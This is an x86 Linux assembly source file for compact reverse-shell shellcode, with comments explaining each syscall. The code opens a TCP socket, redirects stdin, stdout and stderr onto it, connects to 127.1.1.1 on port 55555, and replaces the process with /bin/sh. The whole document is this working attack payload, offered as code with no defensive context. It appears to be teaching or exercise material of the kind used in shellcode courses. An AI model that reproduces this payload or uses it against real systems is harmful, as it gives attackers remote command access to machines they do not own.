  1. global _start
  2.  
  3. section .text
  4.  
  5. _start:
  6.  
  7.     ; host
  8.     push 0x0101017f     ; IP Number "127.1.1.1" in hex reverse order
  9.     pop esi
  10.  
  11.     ; port
  12.     push WORD 0x03d9    ; Port Number 55555 in hex reverse order
  13.     pop edi
  14.  
  15.    
  16.         ; syscalls (/usr/include/asm/unistd_32.h)
  17.         ; socketcall numbers (/usr/include/linux/net.h)
  18.  
  19.         ; Creating the socket file descriptor
  20.         ; int socket(int domain, int type, int protocol);
  21.         ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
  22.  
  23.     push 102
  24.     pop eax         ; syscall 102 - socketcall
  25.     cdq
  26.  
  27.     push 1
  28.     pop ebx         ; socketcall type (sys_socket 1)
  29.  
  30.     push edx        ; IPPROTO_IP = 0 (int)
  31.     push ebx        ; SOCK_STREAM = 1 (int)
  32.     push 2          ; AF_INET = 2 (int)
  33.  
  34. finalint:
  35.  
  36.     mov ecx, esp        ; ptr to argument array
  37.     int 0x80        ; kernel interruption
  38.  
  39.     xchg ebx, eax       ; set ebx with the sockfd
  40.  
  41.    
  42.     ; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
  43.     ; int dup2(int oldfd, int newfd);
  44.     ; dup2 (clientfd, ...)
  45.  
  46.     pop ecx
  47.  
  48. dup_loop:
  49.         mov al, 63      ; syscall 63 - dup2
  50.         int 0x80
  51.  
  52.         dec ecx
  53.         jns dup_loop
  54.  
  55.  
  56.     ; Connecting the duplicated file descriptor to the host
  57.     ; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
  58.     ; connect(sockfd, [AF_INET, 55555, 127.1.1.1], 16)
  59.  
  60.     mov al, 102     ; syscall 102 - socketcall
  61.                 ; socketcall type (sys_connect) 3 - ebx already has it
  62.  
  63.     ; host address structure
  64.     push esi        ; IP number
  65.     push di         ; port in byte reverse order = 55555 (uint16_t)
  66.     push WORD 2     ; AF_INET = 2 (unsigned short int)
  67.     mov ecx, esp        ; struct pointer
  68.  
  69.     ; connect arguments
  70.     push 16         ; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
  71.     push ecx        ; sockaddr_in struct pointer (struct sockaddr *)
  72.     push ebx        ; socket fd (int)
  73.  
  74.     mov ecx, esp
  75.  
  76.     int 0x80
  77.  
  78.         ; Finally, using execve to substitute the actual process with /bin/sh
  79.         ; int execve(const char *filename, char *const argv[], char *const envp[]);
  80.         ; exevcve("/bin/sh", NULL, NULL)
  81.  
  82.         mov al, 11      ; execve syscall
  83.  
  84.     ; execve string argument
  85.         push edx        ; null-byte
  86.         push 0x68732f2f     ; "//sh"
  87.         push 0x6e69622f     ; "/bin"
  88.  
  89.         mov ebx, esp        ; ptr to ["bin//sh", NULL] string
  90.         push edx        ; null ptr to argv
  91.         push ebx        ; null ptr to envp
  92.  
  93.     jmp finalint        ; and jump to bingo